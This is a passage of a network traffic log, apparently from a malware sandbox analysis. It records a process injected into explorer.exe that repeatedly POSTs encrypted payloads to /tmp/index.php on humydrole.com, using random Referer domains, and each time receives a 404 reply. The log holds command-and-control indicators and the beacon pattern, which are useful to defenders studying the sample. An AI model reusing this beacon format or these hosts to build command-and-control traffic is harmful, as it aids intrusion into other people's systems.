Nov 30, 2023 11:20:45.320066929 CET	406	OUT	Data Raw: 3b 6e 21 65 82 cd 61 24 d6 de b3 76 75 02 7e b8 76 0a c9 e5 63 00 90 10 0d 0f 0f 90 49 b6 c3 1a e8 5c c0 5c 76 1e 57 1c e9 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 3e 2e a6 8e Data Ascii: ;n!ea$vu~vcI\\vW? 9Yt M@NA -[k,vu>.uz<mm+eONmQ8@_R\|M$*\|\;R^&V+QH</ND% /e7HwfRi
Nov 30, 2023 11:20:46.600116014 CET	641	IN	HTTP/1.0 404 Not Found Date: Thu, 30 Nov 2023 10:20:45 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49766	123.140.161.243	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:20:46.893282890 CET	340	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://keflgaapiduxrso.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 112 Host: humydrole.com
Nov 30, 2023 11:20:46.893337011 CET	166	OUT	Data Raw: 3b 6e 21 65 82 cd 61 24 d6 de b3 76 75 02 7e b8 76 0a c9 e5 63 00 90 10 0d 0f 0f 90 49 b6 c3 1a e8 5c c0 5c 76 1e 57 1c e9 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 46 42 a2 b7 Data Ascii: ;n!ea$vu~vcI\\vW? 9Yt M@NA -[k,vuFBM#APRAd;c*X
Nov 30, 2023 11:20:48.101130009 CET	641	IN	HTTP/1.0 404 Not Found Date: Thu, 30 Nov 2023 10:20:47 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49767	123.140.161.243	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:20:48.459415913 CET	339	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kadkhogefgtcgq.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 315 Host: humydrole.com
Nov 30, 2023 11:20:48.459462881 CET	369	OUT	Data Raw: 3b 6e 21 65 82 cd 61 24 d6 de b3 76 75 02 7e b8 76 0a c9 e5 63 00 90 10 0d 0f 0f 90 49 b6 c3 1a e8 5c c0 5c 76 1e 57 1c e9 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 41 0a cb eb Data Ascii: ;n!ea$vu~vcI\\vW? 9Yt M@NA -[k,vuAT?sbhYUP>0.NW4}bEE(LCI=ac~+Pw[.O=\|76Y.0Z6.' \|e}GO>CD6
Nov 30, 2023 11:20:49.729013920 CET	641	IN	HTTP/1.0 404 Not Found Date: Thu, 30 Nov 2023 10:20:49 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49768	123.140.161.243	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:20:50.030030966 CET	341	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cltnxkqtdsufheoj.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 263 Host: humydrole.com
Nov 30, 2023 11:20:50.030088902 CET	317	OUT	Data Raw: 3b 6e 21 65 82 cd 61 24 d6 de b3 76 75 02 7e b8 76 0a c9 e5 63 00 90 10 0d 0f 0f 90 49 b6 c3 1a e8 5c c0 5c 76 1e 57 1c e9 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 7f 2f bc e5 Data Ascii: ;n!ea$vu~vcI\\vW? 9Yt M@NA -[k,vu/mNGl{NLP&gip[3JyX<!b\jC9Anpu%Q61wHaEmD+JWh
Nov 30, 2023 11:20:51.270148039 CET	641	IN	HTTP/1.0 404 Not Found Date: Thu, 30 Nov 2023 10:20:50 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49769	123.140.161.243	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:20:51.570494890 CET	339	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://phsktnhwprybph.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 113 Host: humydrole.com
Nov 30, 2023 11:20:51.570523977 CET	167	OUT	Data Raw: 3b 6e 21 65 82 cd 61 24 d6 de b3 76 75 02 7e b8 76 0a c9 e5 63 00 90 10 0d 0f 0f 90 49 b6 c3 1a e8 5c c0 5c 76 1e 57 1c e9 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 56 05 eb 8c Data Ascii: ;n!ea$vu~vcI\\vW? 9Yt M@NA -[k,vuV{-GgEi-m_K\|
Nov 30, 2023 11:20:52.795402050 CET	641	IN	HTTP/1.0 404 Not Found Date: Thu, 30 Nov 2023 10:20:52 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49770	123.140.161.243	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:20:53.089653015 CET	338	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dmgpobcqymepn.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 205 Host: humydrole.com
Nov 30, 2023 11:20:53.089673042 CET	259	OUT	Data Raw: 3b 6e 21 65 82 cd 61 24 d6 de b3 76 75 02 7e b8 76 0a c9 e5 63 00 90 10 0d 0f 0f 90 49 b6 c3 1a e8 5c c0 5c 76 1e 57 1c e9 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 7d 20 d9 ed Data Ascii: ;n!ea$vu~vcI\\vW? 9Yt M@NA -[k,vu} LTPR&ZXWtzb$vUQM*4~PCBBeAobMT>ap{i\F
Nov 30, 2023 11:20:55.632489920 CET	641	IN	HTTP/1.0 404 Not Found Date: Thu, 30 Nov 2023 10:20:53 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49771	123.140.161.243	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:20:55.953553915 CET	337	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pfojbhiilkxg.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 199 Host: humydrole.com
Nov 30, 2023 11:20:55.953622103 CET	253	OUT	Data Raw: 3b 6e 21 65 82 cd 61 24 d6 de b3 76 75 02 7e b8 76 0a c9 e5 63 00 90 10 0d 0f 0f 90 49 b6 c3 1a e8 5c c0 5c 76 1e 57 1c e9 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 4d 14 d1 8d Data Ascii: ;n!ea$vu~vcI\\vW? 9Yt M@NA -[k,vuMnHqtjfVw::7>plPH?EY]nKF% jsJsRR}dT"I5
Nov 30, 2023 11:20:57.194441080 CET	641	IN	HTTP/1.0 404 Not Found Date: Thu, 30 Nov 2023 10:20:56 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49772	123.140.161.243	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:20:57.487832069 CET	340	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yppvmfjklkfxdae.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 194 Host: humydrole.com
Nov 30, 2023 11:20:57.487879038 CET	248	OUT	Data Raw: 3b 6e 21 65 82 cd 61 24 d6 de b3 76 75 02 7e b8 76 0a c9 e5 63 00 90 10 0d 0f 0f 90 49 b6 c3 1a e8 5c c0 5c 76 1e 57 1c e9 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 37 08 d4 f3 Data Ascii: ;n!ea$vu~vcI\\vW? 9Yt M@NA -[k,vu7{#xF_`9owXvs>n!gr]1cAA,FU@80K%RH_&kZ
Nov 30, 2023 11:20:58.737163067 CET	641	IN	HTTP/1.0 404 Not Found Date: Thu, 30 Nov 2023 10:20:58 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49773	123.140.161.243	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:20:59.039091110 CET	336	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xxyqvfoiweh.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 222 Host: humydrole.com
Nov 30, 2023 11:20:59.039124012 CET	276	OUT	Data Raw: 3b 6e 21 65 82 cd 61 24 d6 de b3 76 75 02 7e b8 76 0a c9 e5 63 00 90 10 0d 0f 0f 90 49 b6 c3 1a e8 5c c0 5c 76 1e 57 1c e9 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 6e 03 bb f5 Data Ascii: ;n!ea$vu~vcI\\vW? 9Yt M@NA -[k,vunilv{:wcB5nu69j.o\|I2s+n]5on1cFmU2&(\tjhI5
Nov 30, 2023 11:21:00.244133949 CET	641	IN	HTTP/1.0 404 Not Found Date: Thu, 30 Nov 2023 10:20:59 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 